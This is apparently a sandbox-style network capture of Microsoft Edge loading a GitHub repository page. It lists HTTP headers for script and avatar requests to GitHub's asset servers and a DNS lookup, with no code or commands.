via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kiad7000044-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5562
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 171b47ff2bf579337f69461fb9f3f06fbb6b1dec
content-length: 3969
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236-50158068cc10.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236-50158068cc10.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 15:12:50 GMT
etag: 0x8DBFBEDF8D57FD5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706943
x-served-by: cache-iad-kcgs7200120-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 48, 84720
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d656632533d2540a2e2eaf96593810eb250ef1ac
content-length: 7211
-
GEThttps://github.githubassets.com/assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:08 GMT
etag: 0x8DC33C6BF675D1A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kcgs7200178-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5541
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 68432b5b5c5cd718ada092ac0b97401b4cfda6fb
content-length: 5654
-
GEThttps://github.githubassets.com/assets/chunk-app_assets_modules_github_onfocus_ts-app_components_search_qbsearch-input-element_ts-ui_packa-52ba59-c843a9042665.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_assets_modules_github_onfocus_ts-app_components_search_qbsearch-input-element_ts-ui_packa-52ba59-c843a9042665.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:08 GMT
etag: 0x8DC33C6BF6ADB8D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kcgs7200024-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5586
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b907a8c7828395ed582d24999cba4022f21de3e1
content-length: 24282
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BFA558C8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kcgs7200048-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 5884
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fa631fede5333da3c1da4cea643340ff4adfe406
content-length: 3625
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BFA4E41E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kiad7000140-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5857
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 90aa2c7cbc4013eb9f650660c608007447855c9b
content-length: 3390
-
GEThttps://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-5fadb36426c7.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_query-builder-element_query-builder-element_ts-5fadb36426c7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:24 GMT
etag: 0x8DC3865786E8FB9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100093-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5560
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a014dd20444ff2da97201b5c3107d4736a80d04b
content-length: 8316
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1-5c4d940a245a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1-5c4d940a245a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:19 GMT
etag: 0x8DC386575644A92
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kcgs7200077-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 5559
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1712ba8e68d956f5de30382db83b147053cb9725
content-length: 6380
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BFC3BB17
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kjyo7100116-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 5847
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f9b8aafc6e77b69eef81e8657cfc7be708584464
content-length: 3118
-
GEThttps://github.githubassets.com/assets/chunk-app_assets_modules_react-code-view_components_file-tree_FileResultsList_tsx-5a7f3e39812d.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_assets_modules_react-code-view_components_file-tree_FileResultsList_tsx-5a7f3e39812d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 27 Feb 2024 20:37:57 GMT
etag: 0x8DC37D3FBA57590
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:47 GMT
age: 85840
x-served-by: cache-iad-kcgs7200156-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 3353
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d6b8e4749c2f29c73c1b4f256fcc16bd8cf07c3c
content-length: 5002
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 18 Dec 2023 16:53:05 GMT
etag: 0x8DBFFE9CE26CFC7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:47 GMT
age: 4326958
x-served-by: cache-iad-kjyo7100095-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 53, 91200
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f743eb6db410f3e975b70f56e30adf569186b70e
content-length: 10740
-
Remote address:8.8.8.8:53Requestgithub-cloud.s3.amazonaws.comIN AResponsegithub-cloud.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A3.5.28.18s3-w.us-east-1.amazonaws.comIN A3.5.11.105s3-w.us-east-1.amazonaws.comIN A52.217.167.17s3-w.us-east-1.amazonaws.comIN A52.216.217.49s3-w.us-east-1.amazonaws.comIN A52.217.173.57s3-w.us-east-1.amazonaws.comIN A54.231.199.241s3-w.us-east-1.amazonaws.comIN A52.216.93.195s3-w.us-east-1.amazonaws.comIN A52.216.43.113
-
Remote address:185.199.108.133:443RequestGET /u/44542704?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Mon, 17 Feb 2014 14:33:03 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 9FA8:3B801B:2050270:21A32BD:65D7F111
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 2
x-timer: S1709220766.008346,VS0,VE0
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: e61450fbe44ba321245d47a4d1f10d2d4a9620af
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 569997
vary: Authorization,Accept-Encoding
content-length: 1505
-
Remote address:185.199.108.133:443RequestGET /u/42248228?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "9a2efe452d138368bb47150077cf3966a0e8a699137cd76496cedb32fa6eabb0"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 90B0:2E9678:25F9C31:27B039C:65D9699B
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 189
x-timer: S1709220766.007981,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 30b1a28c932655476a9a73487612a73150f5eb62
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 473576
vary: Authorization,Accept-Encoding
content-length: 3043
-
Remote address:185.199.108.133:443RequestGET /u/63458929?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "bcc9f35f4a15a3090f3b1adfdb7cfb0556b93a44cdde6b1d14c5aa9d81f36a38"
last-modified: Sun, 27 Dec 2020 15:39:11 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 90B0:2E9678:25F92E3:27AF908:65D96980
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 175
x-timer: S1709220766.008935,VS0,VE0
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 9443c5524a64d0fb57ab5937759885eedcc152ce
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 473627
vary: Authorization,Accept-Encoding
content-length: 6047
-
Remote address:185.199.108.133:443RequestGET /u/51242428?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "bbd78d1ccf4743a85b2c5003d9d579945b57235f0c8533ffd5c94ea947c970c8"
last-modified: Sun, 19 Mar 2023 14:46:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: DB28:3976C:2072186:219D16E:65C51F84
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1709220766.008380,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: abc39cff9148145f0d74fc88e0d5cd028ec0889d
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 1803289
vary: Authorization,Accept-Encoding
content-length: 2493
-
Remote address:185.199.108.133:443RequestGET /u/39349444?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "d5c09e3ef46dc6f86f1412a05a1a35bf9d8f63d9dc236affaedec77cebc9749e"
last-modified: Tue, 12 Jul 2022 18:15:38 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 9784:325844:290E1E7:2A9D863:65CE23A5
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1709220766.008682,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 0de28c29c7b85e6716d0f192ee2f7051f5852b48
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 1212408
vary: Authorization,Accept-Encoding
content-length: 1957
-
Remote address:185.199.108.133:443RequestGET /u/17717494?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "bcbeb95c3f21364aef292d9e6c261374e079265660dda6145e13de8a5be8546f"
last-modified: Tue, 19 May 2020 23:35:43 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: D03E:2197E2:123FDA2:12F9F5F:65D66268
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1709220766.008550,VS0,VE7
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 51ef144bda1b480d39b9e143ab43d1c99951f1fc
expires: Thu, 29 Feb 2024 15:37:46 GMT
source-age: 672052
vary: Authorization,Accept-Encoding
content-length: 1590
-
GEThttps://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67msedge.exeRemote address:185.199.108.133:443RequestGET /3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67 HTTP/2.0
host: camo.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 502
content-security-policy: default-src 'none'; img-src data:; style-src 'unsafe-inline'
content-type: text/plain; charset=utf-8
server: github-camo (723732d2)
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 15EA:0E16:39E9BF6:3C6BC3E:65E0A39E
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600055-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1709220766.008966,VS0,VE603
x-fastly-request-id: fede5a4bcc0919000cbd8337483493e9cac77128
timing-allow-origin: https://github.com
content-length: 32
-
Remote address:185.199.108.133:443RequestGET /u/44542704?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "d49ce3184891e8e0e902596e2f95df08a2f1c8418a4a1f671c1685f3ed3398cb"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 9D3E:903B4:32C9D91:352FBC8:65DDB3DF
accept-ranges: bytes
